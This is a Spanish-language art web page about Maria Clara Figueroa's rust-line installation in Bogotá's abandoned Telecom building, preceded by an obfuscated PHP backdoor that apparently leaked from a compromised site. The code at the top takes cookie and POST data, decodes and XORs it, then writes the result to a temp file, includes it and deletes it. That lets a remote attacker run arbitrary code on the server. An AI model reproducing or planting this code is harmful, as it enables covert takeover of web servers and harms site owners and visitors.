$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Portada: Cuando el cuerpo cambia, Maria Clara Figueroa – www.interferencechannel.com

Portada: Cuando el cuerpo cambia, Maria Clara Figueroa

Cuando el cuerpo cambia, una obra de Maria Clara Figueroa que instala en el abandonado edificio Telecom una línea de óxido al horizonte como recordando la ruta que cruza la miseria y la corrupción en el panorama, una línea que parece no tener fin.

La obra señala el estado del edificio y del sector. En los años 90 este sector fue declarado zona de tolerancia, es decir el lugar donde el trabajo sexual es permitido, tornando así todo el barrio en una zona roja. Con el tiempo, la zona se empezó a marginalizar y se evidenció un proceso de gentrificación del Barrio.

El polvo de óxido se dio como consecuencia del estado de abandono y la inundación de los sótanos, que después de ser bombeada dejó un rastro de óxido que la artista Bogotana utilizó para realizar su obra.

Maria Clara es artista plástica Colombiana, se graduó de Maestra en Bellas Artes en la Fundación Universidad de Bogotá Jorge Tadeo Lozano, y la pueden encontrar en instagram como @maclafigueroa

Comments are closed.